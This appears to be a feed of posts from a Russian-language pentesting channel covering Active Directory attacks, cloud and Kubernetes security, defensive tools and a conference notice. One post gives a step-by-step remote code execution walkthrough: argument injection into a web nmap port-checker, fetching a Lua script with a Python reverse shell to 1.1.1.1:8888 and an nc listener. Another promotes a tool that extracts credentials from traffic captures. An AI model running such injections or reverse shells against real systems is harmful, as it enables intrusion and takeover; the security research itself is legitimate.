Цикл статей об атаках на AD. Перевод c https://zer1t0.gitlab.io/posts/attacking_ad/

#AD #Redteam #pentest

https://defcon.ru/penetration-testing/18872/

#OffensiveSecurity понимают что нужно успевать за трендами и открывают новое направление своих курсов в области безопасности облаков - CLD-100.

CLD-100 is fundamental cloud security training for individuals that want to start working towards a specialization in cloud security.

The content in this new training is completely vendor-neutral and will teach students the underlying security concepts of cloud computing. This means that it will provide you with the fundamentals of the technologies and security considerations that underpin the cloud in such a way that can be applied to any cloud vendor, be it Amazon Web Services, Google Cloud, or Microsoft Azure.

With this release, you will be able to access the following cloud security Topics, with more Topics to be released continuously:

Introduction to Cloud 100
Containers for Cloud
Introduction to Kubernetes
Discovering Exposed Docker Sockets
Discovering Exposed Kubernetes Dashboards

Ждём более практический и «хакерский» курс CLD-200!

Очень давно был интересный кейс с сайтом для системных администраторов, где можно было проверить открыт ли порт сайта. Первое, что пришло голову, это вписать в IP:

127.0.0.1 -h

В результате сайт вернул мануал nmap-a. Но многие символы фильтровались и выйти за переделы команды nmap-а не удалось. После этого, путем проб и ошибок, был найден интересный вектор remote code execution.

В составе nmap есть модуль http-fetch, который умеет ходить по URL и скачивать файлы. Более того, можно даже указать куда сохранить файл. Немного покурив, как работают скрипты nmap, было обнаружено, что через функцию os.execute() можно выполнять команды.

0) На своем сервере открываем порт 8888:

nc -lvp 8888

Допустим IP вашего сервера 1.1.1.1

1) Создаем у себя на сервере файл index.php с содержимым:

os.execute("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"1.1.1.1\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'")

2) Запускаем встроенный сервер php:

php -S 0.0.0.0:8080

3) На атакуемом сайте вместо IP пишем:

1.1.1.1 -script http-fetch

Вместо порта:

8080 -dd -script-args destination=/tmp

Т.е. на бэкенде сайта команда преобразуется в что-то типа:

nmap 1.1.1.1 -script http-fetch -p 8080  -dd -script-args destination=/tmp

В результате выполнения этой команды, по пути /tmp/1.1.1.1/8080/index.html будет лежат скрипт с первого шага.

4) Запускаем скачанный скрипт, вписав вместо порта:

8080 -dd -script /tmp/1.1.1.1/8080/index.html 

и получаем бэкконнект.

Таким образом, иногда необязательно выходить за рамки команды, вписывая такие символы, как | & ;.

Вот такой вот зиродей😁

#case #nmap #research #rce

Как то раз на проекте столкнулся с непонятной СЗИ, которая блокировала Collectors bloodhound, как SharpHound, так и bloodhound-python. Я видел 2 варианта решения проблемы:
1. Понять что меня блочит и пробовать обойти блокировки;
2. Попробовать собрать с LDAP данные другими инструментами, желательно легитимными.
Я решил пойти вторым путём и попробовать посмотреть ACL в AD руками. На самом деле, часто BloodHound избыточен, и достаточно посмотреть, есть ли модифицированные привилегии на корневой объект домена. Если есть - то смотреть от кого и проанализировать их ACL. Чем удобнее всего это сделать? Всем по разному, но я использую инструмент Sysinternals AdExplorer.
В AdExplorer есть функционал "Create Snapshot" - данная функция позволяет сдампить LDAP и анализировать его в режиме offline. В этот момент моё сердце забилось чаще, и я бросился в гугл искать, возможно кто-то написал конвертер из дампа AdExplorer в Bloodhound.
По первой же ссылке я столкнулся со скриптом, который отлично выполнил свою задачу, и противную СЗИ я оставил с носом. Берите на вооружение, очень хороший инструмент 🙂

This tool extracts ****** **** numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.

DISCLAIMER:
All the information provided on this channel are for educational and informational purposes only. Any use of this information is therefore strictly at your own risk.

#pentesting #AD #Windows #netsec

https://github.com/snovvcrash/PCredz

Отличный доклад "Харденинг K8S. (Не)очевидные настройки" от моего хорошего товарища поможет правильно посмотреть на CIS Kubernetes Benchmarks.

Очень важно помнить, что не стоит слепо следовать всем требованиям любого Benchmark. Ко всему стоит подходить с чувством, с толком, с расстановкой. Обычно относительно CIS Kubernetes Benchmarks, специалисты изучают его, накладывают на свою инфраструктуру и оставляют 10-20 значимых пунктов и их контролируют, а не слепо добиваются 100% покрытия его. Хорошо это еще все сразу заложить и проверять на стадии IaC, чтобы не пересканитивать это постоянно (особенно с учетом Container-Optimized OS).

🦮 BlueHound

It is an open-source tool that helps blue teams pinpoint the security issues that actually matter. By combining information about user permissions, network access and unpatched vulnerabilities, BlueHound reveals the paths attackers would take if they were inside your network
It is a fork of NeoDash, reimagined, to make it suitable for defensive security purposes.

Blog:
🔗 https://zeronetworks.com/blog/bluehound-community-driven-resilience/

Tool:
🔗 https://github.com/zeronetworks/BlueHound

#ad #sharphound #blueteam

🙀 Our researcher Arseniy Sharoglazov found a new technique for discovering second-level domains!
Useful for:
🐞 Bughunters, for discovering vulns on new domains
🐛 Threathunters, for discovering malicious domains
🎃 Everyone else

Read the research: https://swarm.ptsecurity.com/discovering-domains-via-timing-attack/

Тема сегодняшнего поста это Threat Modeling для Kubernetes методом STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege).

Занимался кто?)

Думаю если и да, то совсем мало кто ... Ведь сидеть разбираться в этом, закапываться в какие-то бумаги мало кто из нас хочет.

Но, одни добрые ребята, взяли и позволили это дело значительно упростить!

В итоге процесс выглядит следующим образом:
1) Скачиваем Microsoft Threat Modeling Tool (MS-TMT)
2) Скачиваем шаблон для этой MS-TMT для поддержки k8s (его как раз ребята и написали и выложили в открытый доступ)
3) Начинаем из разных предоставленных субъектов и объектов рисовать в MS-TMT свою диаграмму взаимодействий между разными ними и обозначать границы доверия (а может у вас ZeroTrust).
4) Далее система сама эта проанализирует и сгенерирует отчет с обнаруженными угрозами по STRIDE.
5) Занимаемся анализом угроз в MS-TMT - отмечаем как: требует исследования, не применима или уже имеет тако-то митигейшен.

*CRTO cheetsheet*

#redteam #AD #CRTO #cheetsheet

https://www.xmind.app/m/874LNH/#devsecops

Open SysConf 2022 Уже в Октябре!
 
Привет, мы готовим новую - четвертую ежегодную встречу Open SysConf'22.

Уже точно есть:
— Три доклада
— Собрано половина бюджета
— Место, дата и время встречи
- Обновленный сайт sysconf.io

Обычно у большинства людей обстоятельства складываются таким образом, что вечно что-то мешает заняться спортом, сделать доклад, поучаствовать в конфе, мешают обычно работа, откладывание за завтра и тп и тд...

Собраться, поделиться знаниями, найти время для себя - это то, что нужно действительно сделать здесь и сейчас (и в Октябре)! Расправь плечи дорогой друг, подними голову и ступай смело вперед:

- https://sysconf.io
- 14 Октября, с 11:00 до 20:00, Алматы.

Зал большой, места хватит всем! Все нужные ссылки, ты найдешь на сайте. Peace ✌️.
 

Fracture - Velocity EP
Label - 1985 Music - ONEF027 - 29 jan 2021
https://www.1985.co.uk/collections/music
https://1985-music.bandcamp.com/releases
https://www.beatport.com/label/1985-music/558

Обнаружил SSRF-уязвимость в плагине Tumbler для XFCE, которая работает по умолчанию. Если кратко, суть в том, что при открытии директории с m3u8-файлом с расширением .mp4 (работает и для .mp3, .avi, .mpg, etc.) можно отправлять любой GET-запрос на любой сервер.

Работает в последней версии Kali Linux, Debian XFCE, и скорее всего в любом другом дистрибутиве Linux с XFCE на борту. Но большую опасность, наверное, несет для Kali Linux, пользователи которого локально тестируют уязвимые приложения типа DVWA, и одного запроса может хватить для компрометации компьютера.

Патч и исправленная версия уже выпущены.

Подробности на моем блоге:
https://murat.one/?p=187

#ssrf #xfce #kali #debian